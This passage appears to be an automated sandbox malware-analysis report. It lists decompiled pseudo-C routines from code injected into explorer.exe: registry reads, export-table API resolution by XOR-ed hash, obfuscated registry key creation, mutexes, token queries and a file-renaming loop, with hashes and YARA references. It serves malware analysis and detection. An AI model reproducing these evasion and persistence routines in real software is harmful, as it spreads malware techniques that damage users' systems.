C-Code - Quality: 100%

			E000CBF37(short* __edx, short* _a4) {
				void* _v8;
				int _v12;
				int _v16;
				char* _v20;
				char* _t30;
				intOrPtr _t31;
				char* _t49;

				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(RegOpenKeyExW(0x80000002, __edx, 0, 0x20019,  &_v8) == 0) {
					if(RegQueryValueExW(_v8, _a4, 0,  &_v16, 0,  &_v12) != 0) {
						L6:
						if(_v8 != 0) {
							_t31 =  *0xde68c; // 0x14cfab8
							 *((intOrPtr*)(_t31 + 0x1c))(_v8);
						}
						_t30 = 0;
						L9:
						return _t30;
					}
					_t49 = E000C8604(_v12);
					_v20 = _t49;
					if(_t49 == 0) {
						goto L6;
					}
					if(RegQueryValueExW(_v8, _a4, 0, 0, _t49,  &_v12) == 0) {
						RegCloseKey(_v8);
						_t30 = _t49;
						goto L9;
					}
					E000C861A( &_v20, 0xfffffffe);
					goto L6;
				}
				return 0;
			}

0x000cbf55
0x000cbf58
0x000cbf5b
0x000cbf66
0x000cbf8a
0x000cbfc7
0x000cbfca
0x000cbfcc
0x000cbfd4
0x000cbfd4
0x000cbfd7
0x000cbfd9
0x00000000
0x000cbfd9
0x000cbf94
0x000cbf96
0x000cbf9c
0x00000000
0x00000000
0x000cbfb8
0x000cbfe5
0x000cbfe8
0x00000000
0x000cbfe8
0x000cbfc0
0x00000000
0x000cbfc6
0x00000000

APIs

RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,00000000,00000000,?,?,000C2C08,00000000), ref: 000CBF5E
RegQueryValueExW.KERNEL32(00000000,000C2C08,00000000,?,00000000,000C2C08,00000000,?,?,000C2C08,00000000), ref: 000CBF82
RegQueryValueExW.KERNEL32(00000000,000C2C08,00000000,00000000,00000000,000C2C08,?,?,000C2C08,00000000), ref: 000CBFB0
RegCloseKey.KERNEL32(00000000,?,?,000C2C08,00000000,?,?,?,?,?,?,?,000000AF,?), ref: 000CBFE5

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: QueryValue$CloseOpen
String ID:
API String ID: 1586453840-0
Opcode ID: a7851e54e30f56c8d416c1b864b217d5c59bf41e52df84a7b71d9aa404f3ba7d
Instruction ID: 5287311d19161c5311007a090eb7e9ccf09f1a8ec080f3f080957cd4843ff4b4
Opcode Fuzzy Hash: a7851e54e30f56c8d416c1b864b217d5c59bf41e52df84a7b71d9aa404f3ba7d
Instruction Fuzzy Hash: 9E210976900118FFDB10DFA5DC45E9EBBF8EF54740F1141AAB905E6261D7309A01DB60

Uniqueness

Uniqueness Score: -1.00%

Function 000CBE9B, Relevance: 6.1, APIs: 4, Instructions: 69
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E000CBE9B(void* __ecx, char* __edx, char* _a4, intOrPtr* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				intOrPtr* _t43;
				char* _t46;

				_t46 = 0;
				_v8 = 0;
				_v16 = 0;
				if(RegOpenKeyExA(__ecx, __edx, 0, 0x20019,  &_v8) != 0) {
					return 0;
				}
				_v12 = 0;
				if(RegQueryValueExA(_v8, _a4, 0,  &_v16, 0,  &_v12) == 0) {
					_t46 = E000C8604(_v12 + 1);
					if(_t46 != 0 && RegQueryValueExA(_v8, _a4, 0,  &_v16, _t46,  &_v12) == 0) {
						_t43 = _a12;
						if(_t43 != 0) {
							 *_t43 = _v12;
						}
					}
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				return _t46;
			}

0x000cbeae
0x000cbeb8
0x000cbebb
0x000cbec3
0x00000000
0x000cbec5
0x000cbecc
0x000cbee6
0x000cbef2
0x000cbef7
0x000cbf15
0x000cbf1a
0x000cbf1f
0x000cbf1f
0x000cbf1a
0x000cbef7
0x000cbf24
0x000cbf2e
0x000cbf2e
0x00000000

APIs

RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,014CFC08,00000000,?,00000002), ref: 000CBEBE
RegQueryValueExA.KERNEL32(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 000CBEE1
RegQueryValueExA.KERNEL32(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 000CBF0E
RegCloseKey.KERNEL32(?,?,00000002), ref: 000CBF2E

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: QueryValue$CloseOpen
String ID:
API String ID: 1586453840-0
Opcode ID: 727feee892f3c20d591ff2dcb9cd7998d04f9d974b5bd6cd0de492d6c76b7d70
Instruction ID: 0a60d65e2cdd778546922eb2bef94615bab3b931e93d59a9e41fb967d6fdba14
Opcode Fuzzy Hash: 727feee892f3c20d591ff2dcb9cd7998d04f9d974b5bd6cd0de492d6c76b7d70
Instruction Fuzzy Hash: 7221EAB5A01148BF9B60DFA9DC85EAEBBF8EF84740B0141AAB901D7220D730DA01DB61

Uniqueness

Uniqueness Score: -1.00%

Function 000CDFAD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E000CDFAD(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E000CD400( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E000CC379( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

0x000cdfb6
0x000cdfb8
0x000cdfbb
0x000cdfbe
0x000cdfc4
0x000ce021
0x00000000
0x000ce021
0x000cdfc6
0x000cdfd1
0x000cdfd4
0x000cdfd9
0x000cdfde
0x000cdfe1
0x000cdfe3
0x000cdfe6
0x000cdfe9
0x000cdfee
0x00000000
0x00000000
0x00000000
0x00000000
0x000cdff0
0x000cdff0
0x000ce002
0x000ce00f
0x000ce013
0x00000000
0x00000000
0x000ce015
0x000ce018
0x000ce019
0x000ce01f
0x00000000
0x00000000
0x00000000
0x000ce01f
0x000ce036
0x000ce03b
0x000ce03f
0x00000000
0x000ce04b
0x000ce04b
0x000ce04d
0x000ce04d
0x000ce053
0x00000000
0x00000000
0x000ce059
0x000ce05d
0x000ce061
0x00000000
0x00000000
0x00000000
0x000ce061
0x000ce067
0x000ce06f
0x000ce074
0x000ce077
0x000ce077
0x000ce079
0x000ce07d
0x000ce085
0x00000000
0x00000000
0x000ce089
0x000ce091
0x00000000
0x00000000
0x00000000
0x000ce091

APIs

LoadLibraryA.KERNEL32(.dll), ref: 000CE07D
GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 000CE089

Strings

.dll, xrefs: 000CE079, 000CE07C

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: .dll
API String ID: 2574300362-2738580789
Opcode ID: 73480dcf04640b5668e538ebe0794b7acac3a1320454cbe5ad927de6f1f71708
Instruction ID: 5f9d211447d3819fd503f87bdcf7e534d45c92374d2040a9589af20f045a33b0
Opcode Fuzzy Hash: 73480dcf04640b5668e538ebe0794b7acac3a1320454cbe5ad927de6f1f71708
Instruction Fuzzy Hash: 6D31B231A001959BDB64CFA9C884BAEBBE5AF44304F38446ED905D7352DA74ED81CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 000C9B43, Relevance: 4.8, APIs: 3, Instructions: 254
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E000C9B43(char __ecx, int __edx, void* __fp0, int* _a4, int* _a8, int* _a12) {
				void* _v8;
				int _v12;
				void* _v16;
				void* _v20;
				int _v24;
				void* _v28;
				char _v32;
				char _v36;
				int* _v40;
				int** _v44;
				void _v108;
				int* _t90;
				void* _t91;
				char* _t92;
				long _t96;
				int* _t97;
				intOrPtr _t98;
				int* _t101;
				long _t111;
				int* _t112;
				intOrPtr _t122;
				char* _t125;
				intOrPtr _t126;
				intOrPtr _t128;
				int* _t129;
				intOrPtr _t131;
				int* _t133;
				intOrPtr _t134;
				int* _t135;
				intOrPtr _t136;
				char* _t139;
				int _t143;
				int _t147;
				intOrPtr _t148;
				int* _t149;
				int* _t154;
				int** _t155;
				int* _t161;
				int* _t163;
				intOrPtr _t164;
				intOrPtr _t171;
				int _t176;
				char* _t177;
				char* _t178;
				char _t179;
				void* _t180;
				void* _t181;
				void* _t183;

				_t176 = 0;
				_v24 = __edx;
				_t177 = 0;
				_v32 = __ecx;
				_v28 = 0;
				_v8 = 0x80000001;
				_v20 = 0;
				_t155 = E000C8604(0x110);
				_v44 = _t155;
				if(_t155 != 0) {
					_t158 = _a4;
					_t155[0x42] = _a4;
					E000CB5F6(_a4, __edx, __eflags, __fp0, _t158,  &_v108);
					_t161 = _v108;
					__eflags = _t161 - 0x61 - 0x19;
					_t90 = _t161;
					if(_t161 - 0x61 <= 0x19) {
						_t90 = _t90 - 0x20;
						__eflags = _t90;
					}
					_v108 = _t90;
					_t91 = E000C95C7(0x4d2);
					_t163 = _v24;
					_v16 = _t91;
					__eflags = _t163;
					if(_t163 == 0) {
						L16:
						_t164 =  *0xde688; // 0xf0000
						__eflags =  *((intOrPtr*)(_t164 + 0x214)) - 3;
						if( *((intOrPtr*)(_t164 + 0x214)) != 3) {
							_push(_t176);
							_push( &_v108);
							_push("\\");
							_t92 = E000C9292(_t91);
							_t181 = _t181 + 0x10;
							L20:
							_t177 = _t92;
							_v20 = _t177;
							goto L21;
						}
						_v24 = _t176;
						_v8 = 0x80000003;
						_t122 =  *0xde68c; // 0x14cfab8
						 *((intOrPtr*)(_t122 + 0x20))( *((intOrPtr*)( *((intOrPtr*)(_t164 + 0x110)))),  &_v24);
						__eflags = _v24 - _t177;
						if(_v24 == _t177) {
							goto L21;
						}
						_push(_t176);
						_push( &_v108);
						_t125 = "\\";
						_push(_t125);
						_push(_v16);
						_push(_t125);
						_t92 = E000C9292(_v24);
						_t181 = _t181 + 0x18;
						goto L20;
					} else {
						_t126 =  *0xde688; // 0xf0000
						_t128 =  *0xde68c; // 0x14cfab8
						_t129 =  *((intOrPtr*)(_t128 + 0x68))(_t163,  *((intOrPtr*)( *((intOrPtr*)(_t126 + 0x110)))));
						__eflags = _t129;
						if(_t129 != 0) {
							_t91 = _v16;
							goto L16;
						}
						_v12 = _t176;
						_t131 =  *0xde68c; // 0x14cfab8
						_v8 = 0x80000003;
						 *((intOrPtr*)(_t131 + 0x20))(_v24,  &_v12);
						__eflags = _v12 - _t177;
						if(_v12 == _t177) {
							L21:
							E000C85C2( &_v16);
							_t96 = RegOpenKeyExA(_v8, _t177, _t176, 0x20019,  &_v28);
							__eflags = _t96;
							if(_t96 == 0) {
								_t97 = _a8;
								__eflags = _t97;
								if(_t97 != 0) {
									 *_t97 = 1;
								}
								_push(_v28);
								L30:
								_t98 =  *0xde68c; // 0x14cfab8
								 *((intOrPtr*)(_t98 + 0x1c))();
								_t155[0x43] = _v8;
								_t101 = E000CC379(_t177);
								 *_t155 = _t101;
								__eflags = _t101;
								if(_t101 == 0) {
									L32:
									E000C861A( &_v20, 0xffffffff);
									return _t155;
								} else {
									goto L31;
								}
								do {
									L31:
									 *(_t155 + _t176 + 4) =  *(_t180 + (_t176 & 0x00000003) + 8) ^ _t177[_t176];
									_t176 = _t176 + 1;
									__eflags = _t176 -  *_t155;
								} while (_t176 <  *_t155);
								goto L32;
							}
							_v16 = _t176;
							_t111 = RegCreateKeyA(_v8, _t177,  &_v16);
							__eflags = _t111;
							if(_t111 == 0) {
								_t112 = _a8;
								__eflags = _t112;
								if(_t112 != 0) {
									 *_t112 = _t176;
								}
								_push(_v16);
								goto L30;
							}
							L23:
							E000C861A( &_v44, 0x110);
							memset( &_v108, _t176, 0x40);
							E000C861A( &_v20, 0xffffffff);
							goto L1;
						}
						_push(_t176);
						_push(_v16);
						_t178 = "\\";
						_push(_t178);
						_t133 = E000C9292(_v12);
						_t181 = _t181 + 0x10;
						_v40 = _t133;
						__eflags = _t133;
						if(_t133 == 0) {
							goto L23;
						}
						_t134 =  *0xde68c; // 0x14cfab8
						_t135 =  *((intOrPtr*)(_t134 + 0x14))(_v8, _t133, _t176, 0x20019,  &_v36);
						__eflags = _t135;
						if(_t135 == 0) {
							_t136 =  *0xde68c; // 0x14cfab8
							 *((intOrPtr*)(_t136 + 0x1c))(_v36);
						} else {
							_t143 = E000C95E1( &_v36, 0x34);
							_v24 = _t143;
							_t179 = E000C92E5(_v32);
							_v32 = _t179;
							E000C85D5( &_v24);
							_t183 = _t181 + 0x18;
							_t147 = E000C9256(_v12);
							_v24 = _t147;
							_t148 =  *0xde68c; // 0x14cfab8
							_t149 =  *((intOrPtr*)(_t148 + 0x30))(_v8, _t147, _t179, "\\", _t143, _t176);
							__eflags = _t149;
							if(_t149 == 0) {
								_t154 = _a12;
								__eflags = _t154;
								if(_t154 != 0) {
									 *_t154 = 1;
								}
							}
							E000C861A( &_v32, 0xfffffffe);
							E000C861A( &_v24, 0xfffffffe);
							_t181 = _t183 + 0x10;
							_t178 = "\\";
						}
						_t139 = E000C9292(_v12);
						_t171 =  *0xde684; // 0x14cf8f0
						_t181 = _t181 + 0x18;
						_t177 = _t139;
						_v20 = _t177;
						 *((intOrPtr*)(_t171 + 0x34))(_v12, _t178, _v16, _t178,  &_v108, _t176);
						E000C861A( &_v40, 0xffffffff);
						goto L21;
					}
				}
				L1:
				return 0;
			}

0x000c9b4c
0x000c9b4e
0x000c9b51
0x000c9b53
0x000c9b5b
0x000c9b5e
0x000c9b65
0x000c9b6d
0x000c9b6f
0x000c9b75
0x000c9b7e
0x000c9b86
0x000c9b8c
0x000c9b93
0x000c9b99
0x000c9b9b
0x000c9b9e
0x000c9ba0
0x000c9ba0
0x000c9ba0
0x000c9ba8
0x000c9bab
0x000c9bb0
0x000c9bb3
0x000c9bb6
0x000c9bb8
0x000c9cee
0x000c9cee
0x000c9cf4
0x000c9cfb
0x000c9d3c
0x000c9d40
0x000c9d41
0x000c9d47
0x000c9d4c
0x000c9d4f
0x000c9d4f
0x000c9d51
0x00000000
0x000c9d51
0x000c9d00
0x000c9d0a
0x000c9d13
0x000c9d18
0x000c9d1b
0x000c9d1e
0x00000000
0x00000000
0x000c9d20
0x000c9d24
0x000c9d25
0x000c9d2a
0x000c9d2b
0x000c9d2e
0x000c9d32
0x000c9d37
0x00000000
0x000c9bbe
0x000c9bbe
0x000c9bcb
0x000c9bd1
0x000c9bd4
0x000c9bd6
0x000c9ceb
0x00000000
0x000c9ceb
0x000c9bdf
0x000c9be3
0x000c9beb
0x000c9bf2
0x000c9bf5
0x000c9bf8
0x000c9d54
0x000c9d57
0x000c9d6f
0x000c9d72
0x000c9d74
0x000c9dc8
0x000c9dcb
0x000c9dcd
0x000c9dcf
0x000c9dcf
0x000c9dd5
0x000c9dd8
0x000c9dd8
0x000c9ddd
0x000c9de4
0x000c9dea
0x000c9def
0x000c9df2
0x000c9df4
0x000c9e0b
0x000c9e11
0x00000000
0x00000000
0x00000000
0x00000000
0x000c9df6
0x000c9df6
0x000c9e02
0x000c9e06
0x000c9e07
0x000c9e07
0x00000000
0x000c9df6
0x000c9d79
0x000c9d86
0x000c9d89
0x000c9d8b
0x000c9dba
0x000c9dbd
0x000c9dbf
0x000c9dc1
0x000c9dc1
0x000c9dc3
0x00000000
0x000c9dc3
0x000c9d8d
0x000c9d96
0x000c9da2
0x000c9dad
0x00000000
0x000c9db2
0x000c9bfe
0x000c9bff
0x000c9c02
0x000c9c07
0x000c9c0b
0x000c9c10
0x000c9c13
0x000c9c16
0x000c9c18
0x00000000
0x00000000
0x000c9c29
0x000c9c31
0x000c9c34
0x000c9c36
0x000c9cab
0x000c9cb3
0x000c9c38
0x000c9c3a
0x000c9c49
0x000c9c51
0x000c9c57
0x000c9c5a
0x000c9c62
0x000c9c65
0x000c9c6f
0x000c9c72
0x000c9c77
0x000c9c7a
0x000c9c7c
0x000c9c7e
0x000c9c81
0x000c9c83
0x000c9c85
0x000c9c85
0x000c9c83
0x000c9c91
0x000c9c9c
0x000c9ca1
0x000c9ca4
0x000c9ca4
0x000c9cc3
0x000c9cc8
0x000c9cce
0x000c9cd1
0x000c9cd3
0x000c9cd9
0x000c9ce2
0x00000000
0x000c9ce8
0x000c9bb8
0x000c9b77
0x00000000

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: dbe772954fbdf0f7346addee2f82cb35bc63da3f279e120720e911b77a959b0f
Instruction ID: d99cd1c3d9fcc3767b0c57ffbf3441cc8e1f37364192496a450fb361744b74f1
Opcode Fuzzy Hash: dbe772954fbdf0f7346addee2f82cb35bc63da3f279e120720e911b77a959b0f
Instruction Fuzzy Hash: FB913CB1D00209AFDF10DF95CC89EEEBBB8EF18350F10416AF915AB292D7349A00CB61

Uniqueness

Uniqueness Score: -1.00%

Function 000CB998, Relevance: 4.6, APIs: 3, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E000CB998(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E000C8604(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E000C861A( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}

0x000cb99b
0x000cb99c
0x000cb9a3
0x000cb9ab
0x000cb9af
0x000cb9b8
0x000cb9fe
0x000cb9fe
0x000cb9c5
0x000cb9cd
0x000cb9cf
0x000cb9d5
0x000cb9ee
0x00000000
0x000cb9f0
0x000cb9f5
0x00000000
0x000cb9fb
0x000cb9d7
0x000cb9d7
0x000cb9d7
0x000cb9d7
0x000cb9d5
0x000cba04

APIs

GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,000CBA37,?,00000000,?,000CD0A8), ref: 000CB9B3
GetLastError.KERNEL32(?,000CBA37,?,00000000,?,000CD0A8), ref: 000CB9BA

Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612

GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,000CBA37,?,00000000,?,000CD0A8), ref: 000CB9E9

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: InformationToken$AllocateErrorHeapLast
String ID:
API String ID: 2499131667-0
Opcode ID: e7776a111618df8e1eb6d3c21fda07cffef43c1b7da24d7cd6ef38b0e6b938d5
Instruction ID: d997e41f721a916132a1fdbd49b54382bda47c6799cd78954eaa02ec7e04328f
Opcode Fuzzy Hash: e7776a111618df8e1eb6d3c21fda07cffef43c1b7da24d7cd6ef38b0e6b938d5
Instruction Fuzzy Hash: A501A272601118BF9B209BA6DC4AEAF7FECDB457A1B10022AFA05D7111EB30DD0087B0

Uniqueness

Uniqueness Score: -1.00%

Function 000C590C, Relevance: 4.5, APIs: 3, Instructions: 44
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000C590C(CHAR* __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr _t10;
				void* _t13;
				void* _t19;
				signed int _t21;
				signed int _t22;

				_t13 = __edx;
				if(__ecx != 0) {
					_t22 = 0;
					_t19 = CreateMutexA(0, 1, __ecx);
					if(_t19 != 0) {
						if(GetLastError() != 0xb7 || E000CA4BF(_t19, _t13) != 0xffffffff) {
							_t22 = 1;
							 *_a4 = _t19;
						} else {
							_t10 =  *0xde684; // 0x14cf8f0
							 *((intOrPtr*)(_t10 + 0x30))(_t19);
						}
					} else {
						GetLastError();
						_t22 = 0xffffffff;
					}
				} else {
					_t22 = _t21 | 0xffffffff;
				}
				return _t22;
			}

0x000c5910
0x000c5915
0x000c5921
0x000c592e
0x000c5932
0x000c594a
0x000c596a
0x000c596b
0x000c595a
0x000c595a
0x000c5960
0x000c5960
0x000c5934
0x000c5934
0x000c593a
0x000c593a
0x000c5917
0x000c5917
0x000c5917
0x000c5973

APIs

CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,?,000C59CD,000C5DD4,Global,000DBA18,?,00000000,?,00000002), ref: 000C5928
GetLastError.KERNEL32(?,?,000C59CD,000C5DD4,Global,000DBA18,?,00000000,?,00000002), ref: 000C5934

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: CreateErrorLastMutex
String ID:
API String ID: 1925916568-0
Opcode ID: a8e76bdbdbd469d2b8c3e9a1a01432ac857b6536fe4a497d4adbc72172b7e5b0
Instruction ID: d073c145edc5ca2aa73541b9c57a8b093e21ae94b269b6476e6d31558b2c847e
Opcode Fuzzy Hash: a8e76bdbdbd469d2b8c3e9a1a01432ac857b6536fe4a497d4adbc72172b7e5b0
Instruction Fuzzy Hash: A1F02835601910CBD6A0175ADC84F3E7B98EB95772B51036AF969DB1E1CF34DC4443B1

Uniqueness

Uniqueness Score: -1.00%

Function 000CA471, Relevance: 4.5, APIs: 3, Instructions: 30
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000CA471(CHAR* __ecx, void* __edx) {
				intOrPtr _t8;
				void* _t16;
				void* _t17;

				_t16 = __edx; // executed
				_t17 = CreateMutexA(0, 1, __ecx);
				if(_t17 != 0) {
					if(GetLastError() == 0xb7 && E000CA4BF(_t17, _t16) < 0) {
						_t8 =  *0xde684; // 0x14cf8f0
						 *((intOrPtr*)(_t8 + 0x30))(_t17);
						_t17 = 0;
					}
					return _t17;
				}
				GetLastError();
				return 0;
			}

0x000ca47d
0x000ca485
0x000ca489
0x000ca4a0
0x000ca4af
0x000ca4b5
0x000ca4b8
0x000ca4b8
0x00000000
0x000ca4ba
0x000ca48b
0x00000000

APIs

CreateMutexA.KERNELBASE(00000000,00000001,?,00000000,00000000,000C4E14,00000000), ref: 000CA47F
GetLastError.KERNEL32 ref: 000CA48B
GetLastError.KERNEL32 ref: 000CA495

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: ErrorLast$CreateMutex
String ID:
API String ID: 200418032-0
Opcode ID: 77e21d80ee078d91a8c29d57bde9561238bcfa181556416213a9dbb61c26a2d7
Instruction ID: aa0b7b2252ede9d51be57bd9111e8f042ae3321c19d90ec579b42b1c7a2d6374
Opcode Fuzzy Hash: 77e21d80ee078d91a8c29d57bde9561238bcfa181556416213a9dbb61c26a2d7
Instruction Fuzzy Hash: 49F0ED313014249BE6252729E88CF5F3B99DFE9754F02446AFA09CB251EAACCC0643F2

Uniqueness

Uniqueness Score: -1.00%

Function 000C6DA0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 106
fileCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E000C6DA0(void* __eflags, void* __fp0) {
				short _v536;
				WCHAR* _v544;
				WCHAR* _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				void* _t22;
				void* _t32;
				intOrPtr _t34;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t46;
				intOrPtr _t49;
				void* _t51;
				void* _t53;
				void* _t56;
				WCHAR* _t59;
				signed int _t60;
				void* _t62;
				void* _t63;
				void* _t74;

				_t74 = __fp0;
				_t34 =  *0xde778; // 0x14cfc08
				_t62 = (_t60 & 0xfffffff8) - 0x21c;
				_t51 = 0x31;
				_t32 = 1; // executed
				_t9 = E000C9ED0(_t34, _t51); // executed
				if(_t9 != 0) {
					_t10 =  *0xde78c; // 0x0
					_t66 = _t10;
					if(_t10 == 0) {
						_t49 =  *0xde688; // 0xf0000
						_t10 = E000CEDCF(_t49 + 0xb0, _t51, _t66);
						 *0xde78c = _t10;
					}
					_push(0);
					_push(_t10);
					_t11 =  *0xde688; // 0xf0000
					_push(L"\\c");
					_t9 = E000C92E5(_t11 + 0x438);
					_t59 = _t9;
					_t63 = _t62 + 0x10;
					_v544 = _t59;
					if(_t59 != 0) {
						while(1) {
							_t35 =  *0xde688; // 0xf0000
							_t56 = E000CA471(_t35 + 0x1878, 0x1388);
							if(_t56 == 0) {
								break;
							}
							if(E000CB269(_t59) == 0) {
								_t32 = E000CF14F(_t59, 0x1388, _t74);
							}
							E000CA4DB(_t56);
							_t41 =  *0xde684; // 0x14cf8f0
							 *((intOrPtr*)(_t41 + 0x30))(_t56);
							if(_t32 > 0) {
								E000C980C( &_v544);
								_t43 =  *0xde778; // 0x14cfc08
								_t53 = 0x33;
								if(E000C9ED0(_t43, _t53) != 0) {
									L12:
									__eflags = E000C1C68(_t59, __eflags, _t74);
									if(__eflags >= 0) {
										E000CB1B1(_t59, _t53, __eflags, _t74);
										continue;
									}
								} else {
									_t46 =  *0xde778; // 0x14cfc08
									_t53 = 0x12;
									_t22 = E000C9ED0(_t46, _t53);
									_t72 = _t22;
									if(_t22 != 0 || E000CA4EF(_t53, _t72) != 0) {
										_push(E000C980C(0));
										E000C9640( &_v536, 0x104, L"%s.%u", _t59);
										_t63 = _t63 + 0x14;
										MoveFileW(_t59,  &_v536);
										continue;
									} else {
										goto L12;
									}
								}
							}
							break;
						}
						_t9 = E000C861A( &_v544, 0xfffffffe);
					}
				}
				return _t9;
			}

0x000c6da0
0x000c6da6
0x000c6dac
0x000c6db9
0x000c6dba
0x000c6dbb
0x000c6dc2
0x000c6dc8
0x000c6dcd
0x000c6dcf
0x000c6dd1
0x000c6ddd
0x000c6de2
0x000c6de2
0x000c6de7
0x000c6de9
0x000c6dea
0x000c6df4
0x000c6dfa
0x000c6dff
0x000c6e01
0x000c6e04
0x000c6e0a
0x000c6e10
0x000c6e10
0x000c6e26
0x000c6e2a
0x00000000
0x00000000
